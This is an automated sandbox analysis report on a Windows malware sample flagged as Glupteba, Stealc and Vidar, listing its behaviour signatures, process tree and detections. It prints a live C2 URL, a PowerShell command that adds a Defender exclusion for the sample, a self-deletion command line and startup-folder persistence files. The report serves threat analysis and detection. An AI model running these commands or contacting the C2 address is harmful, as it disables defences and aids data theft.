Windows Analysis Report
dl7WL77rkA.exe

Overview

General Information

Sample name: dl7WL77rkA.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name: 39245735a6a4d2495cb6a5207bb9d5e2b6c058d113b6b0efc292330a89611757
Analysis ID: 1406292
MD5: f1e075f8cebe5aaca53ed7c158d81cbd
SHA1: 11f80b386b8a04a4f82d065cefb634bb389e9dbd
SHA256: 39245735a6a4d2495cb6a5207bb9d5e2b6c058d113b6b0efc292330a89611757

Detection

Glupteba, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic
Yara detected Glupteba
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Connects to many IPs within the same subnet mask (likely port scanning)
Connects to many ports of the same IP (likely port scanning)
Creates HTML files with .exe extension (expired dropper behavior)
Disables UAC (registry)
Drops script or batch files to the startup folder
Found Tor onion address
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Outbound Kerberos Connection
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • dl7WL77rkA.exe (PID: 3876 cmdline: C:\Users\user\Desktop\dl7WL77rkA.exe MD5: F1E075F8CEBE5AACA53ED7C158D81CBD)
    • powershell.exe (PID: 44248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 44256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AddInProcess32.exe (PID: 44264 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • CGZL5y3D81OCbb2NABnHZhPM.exe (PID: 44932 cmdline: "C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe" MD5: D9578A8E9EE343BC53B08FD8101F66E9)
        • wfplwfs.exe (PID: 7796 cmdline: C:\Users\user\AppData\Local\Temp\wfplwfs.exe MD5: ED7321DFC04F801D87AB2F3B4ABCB8FB)
          • rundll32.exe (PID: 11040 cmdline: C:\Windows\system32\rundll32.exe MD5: 889B99C52A60DD49227C5E485A016679)
          • rundll32.exe (PID: 11316 cmdline: C:\Windows\system32\rundll32.exe MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 8480 cmdline: cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 9660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • PING.EXE (PID: 11584 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • kDgMkoNM3lKxwY8D8wOiP15F.exe (PID: 44956 cmdline: "C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe" MD5: BD90ED9339BF690DAF83101CAA9EC91A)
        • syncUpd.exe (PID: 5376 cmdline: C:\Users\user\AppData\Local\Temp\syncUpd.exe MD5: DBA6DB51EA13E585AEE6136021836641)
        • BroomSetup.exe (PID: 23124 cmdline: C:\Users\user\AppData\Local\Temp\BroomSetup.exe MD5: EEE5DDCFFBED16222CAC0A1B4E2E466E)
      • 3BiVM2uOsvGVXA1BoDorVuCU.exe (PID: 44984 cmdline: "C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe" MD5: BD90ED9339BF690DAF83101CAA9EC91A)
      • VT4T5BrKWgz9d48cmEd8ePkZ.exe (PID: 7280 cmdline: "C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe" MD5: 54F38AF9A5ADA40065F7B6008661E8A1)
      • sUyDoVTGsfEnMY0oeyexTBut.exe (PID: 7308 cmdline: "C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe" MD5: 54F38AF9A5ADA40065F7B6008661E8A1)
      • VvPx7JMqkEvTJAQ2rPS2y2wf.exe (PID: 7392 cmdline: "C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe" MD5: C03384EE0CB8E3A2FD0C84052AC0581F)
      • BTnjKpTBDzKtQo69b5SrwYDx.exe (PID: 7444 cmdline: "C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe" MD5: BD90ED9339BF690DAF83101CAA9EC91A)
      • MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe (PID: 7568 cmdline: "C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe" MD5: C03384EE0CB8E3A2FD0C84052AC0581F)
      • nxFajWDYSB3pQQxmrqt3pD1T.exe (PID: 7740 cmdline: "C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe" MD5: D9578A8E9EE343BC53B08FD8101F66E9)
      • yq7sRYx0zxf2nUHNI8myIvQb.exe (PID: 7880 cmdline: "C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe" MD5: BD90ED9339BF690DAF83101CAA9EC91A)
      • yzAPe25HGnxqbkafYprXvqQ2.exe (PID: 8012 cmdline: "C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe" MD5: BD90ED9339BF690DAF83101CAA9EC91A)
      • LP2uR8v5nKtflOO7HsEX74Am.exe (PID: 8104 cmdline: "C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe" MD5: 54F38AF9A5ADA40065F7B6008661E8A1)
      • 65bl5N8ldxUdfHpwZdasCC1T.exe (PID: 8128 cmdline: "C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe" MD5: D9578A8E9EE343BC53B08FD8101F66E9)
      • LEGkdjk2eFexBjdd51KvbC5Q.exe (PID: 8148 cmdline: "C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe" MD5: D9578A8E9EE343BC53B08FD8101F66E9)
      • BitVM4h79HXjwHpz9WBgoxJI.exe (PID: 8200 cmdline: "C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe" MD5: BD90ED9339BF690DAF83101CAA9EC91A)
      • YfSmDepXBWKsGmamEEWNYwB5.exe (PID: 8520 cmdline: "C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe" MD5: C03384EE0CB8E3A2FD0C84052AC0581F)
      • RC2DCMOzLtOY3PfjMU0omeEi.exe (PID: 8680 cmdline: "C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe" MD5: BD90ED9339BF690DAF83101CAA9EC91A)
      • pxzTG78L668f3mDyeDkHXryr.exe (PID: 8708 cmdline: "C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe" MD5: 54F38AF9A5ADA40065F7B6008661E8A1)
      • MK1r6sTJJ0KuvAGWdjimbW8H.exe (PID: 8740 cmdline: "C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe" MD5: C03384EE0CB8E3A2FD0C84052AC0581F)
      • gIvDEh2BZp9B1K9gi8nXHxAG.exe (PID: 8816 cmdline: "C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe" MD5: BD90ED9339BF690DAF83101CAA9EC91A)
        • Conhost.exe (PID: 20032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PM6qM9TthMxsL1RAWEhuUNLx.exe (PID: 10220 cmdline: "C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe" MD5: C03384EE0CB8E3A2FD0C84052AC0581F)
    • AddInProcess32.exe (PID: 44316 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • WerFault.exe (PID: 44548 cmdline: C:\Windows\system32\WerFault.exe -u -p 3876 -s 134468 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • wfplwfs.exe (PID: 11168 cmdline: C:\Users\user\AppData\Local\Temp\wfplwfs.exe MD5: ED7321DFC04F801D87AB2F3B4ABCB8FB)
  • chrome.exe (PID: 14672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://hentaitoonami.com/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 16744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2216,i,3713958764592762144,12864230647668828489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cmd.exe (PID: 19504 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 19828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 24136 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 25656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Glupteba
Description: Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first to grab information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
Source | Rule | Description | Author | Strings
0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security |
0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown |
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000001E.00000002.3216770112.0000000003203000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Glupteba | Yara detected Glupteba | Joe Security |
00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown |
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

Source | Rule | Description | Author | Strings
15.2.syncUpd.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
15.2.syncUpd.exe.400000.0.raw.unpack | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security |
15.3.syncUpd.exe.22d0000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
15.3.syncUpd.exe.22d0000.0.unpack | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security |
15.2.syncUpd.exe.8f0e67.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

                  System Summary

                  Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Windows\system32\rundll32.exe, CommandLine: C:\Windows\system32\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\wfplwfs.exe, ParentImage: C:\Users\user\AppData\Local\Temp\wfplwfs.exe, ParentProcessId: 7796, ParentProcessName: wfplwfs.exe, ProcessCommandLine: C:\Windows\system32\rundll32.exe, ProcessId: 11040, ProcessName: rundll32.exe
                  Source: Network ConnectionAuthor: Markus Neis: Data: DestinationIp: 125.227.225.157, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\dl7WL77rkA.exe, Initiated: true, ProcessId: 3876, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 50653
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 177.230.183.185, DestinationIsIpv6: false, DestinationPort: 10101, EventID: 3, Image: C:\Users\user\Desktop\dl7WL77rkA.exe, Initiated: true, ProcessId: 3876, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49959
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\dl7WL77rkA.exe, ParentImage: C:\Users\user\Desktop\dl7WL77rkA.exe, ParentProcessId: 3876, ParentProcessName: dl7WL77rkA.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force, ProcessId: 44248, ProcessName: powershell.exe
                  Source: Network ConnectionAuthor: Ilyas Ochkov, oscd.community: Data: DestinationIp: 93.157.248.108, DestinationIsIpv6: false, DestinationPort: 88, EventID: 3, Image: C:\Users\user\Desktop\dl7WL77rkA.exe, Initiated: true, ProcessId: 3876, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 50292
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 102.68.128.212, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\dl7WL77rkA.exe, Initiated: true, ProcessId: 3876, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49725
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 160.248.80.91, DestinationIsIpv6: false, DestinationPort: 2525, EventID: 3, Image: C:\Users\user\Desktop\dl7WL77rkA.exe, Initiated: true, ProcessId: 3876, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 53606
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\dl7WL77rkA.exe, ParentImage: C:\Users\user\Desktop\dl7WL77rkA.exe, ParentProcessId: 3876, ParentProcessName: dl7WL77rkA.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force, ProcessId: 44248, ProcessName: powershell.exe

                  Data Obfuscation

                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 44264, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5MU2eoXrXWjMqtCDgcUdxEXh.bat
Timestamp: 03/11/24-03:30:46.099473
SID: 2856466
Source Port: 55130
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 03/11/24-03:30:45.843635
SID: 2856463
Source Port: 51596
Destination Port: 53
Protocol: UDP
Classtype: A Network Trojan was detected

                  AV Detection

                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAvira: detection malicious, Label: HEUR/AGEN.1316657
                  Source: C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen7
                  Source: C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen7
                  Source: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
                  Source: 0000000F.00000003.2437075338.00000000022D0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
                  Source: C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeReversingLabs: Detection: 75%
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeReversingLabs: Detection: 28%
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeReversingLabs: Detection: 47%
                  Source: C:\Users\user\AppData\Local\bAqeOotivBzC3mPFFhCilCro.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\AppData\Local\wHBfjqvEYiXClqcsZASJdtJJ.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exeReversingLabs: Detection: 57%
                  Source: dl7WL77rkA.exeReversingLabs: Detection: 62%
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\SNePs0JIjHDOAKzI11CQ043K.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\IiRP3mWif0xpaQsabblBwYAE.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\IpW6W2Yjx6z6D3j66j3N2tH5.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\H7TIhgIvG1Yhal1QnwrEdA0q.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Jye7PnMsJdWwQaaabqxbHITx.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\4xb6JU3I8UdzuT7ogqFnBL7Y.exeJoe Sandbox ML: detected
                  Source: dl7WL77rkA.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00401870 CryptStringToBinaryA,CryptStringToBinaryA,_malloc,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,CertGetCertificateContextProperty,_malloc,_memset,CertGetCertificateContextProperty,_memset,_memset,_memset,_sprintf,SHGetSpecialFolderPathA,_sprintf,CertCloseStore,CertFreeCertificateContext,12_2_00401870
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00402C34 HeapAlloc,CryptStringToBinaryA,__FF_MSGBANNER,__NMSG_WRITE,HeapAlloc,12_2_00402C34
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00406739 CryptStringToBinaryA,GetLastError,___set_flsgetvalue,TlsGetValue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,SetLastError,12_2_00406739
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,15_2_00406C10
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,15_2_004094A0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,15_2_00409540
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_004155A0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,15_2_004155A0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,15_2_0040BF90
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00905807 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,15_2_00905807
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008FC1F7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,15_2_008FC1F7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008F6E77 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,15_2_008F6E77
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008F97A7 CryptUnprotectData,LocalAlloc,LocalFree,15_2_008F97A7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008F9707 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,15_2_008F9707

                  Bitcoin Miner

                  Source: Yara matchFile source: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.2d80e67.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.2da0e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.2e10e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.2e10e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.2cb0e67.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.2e80e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.3216770112.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
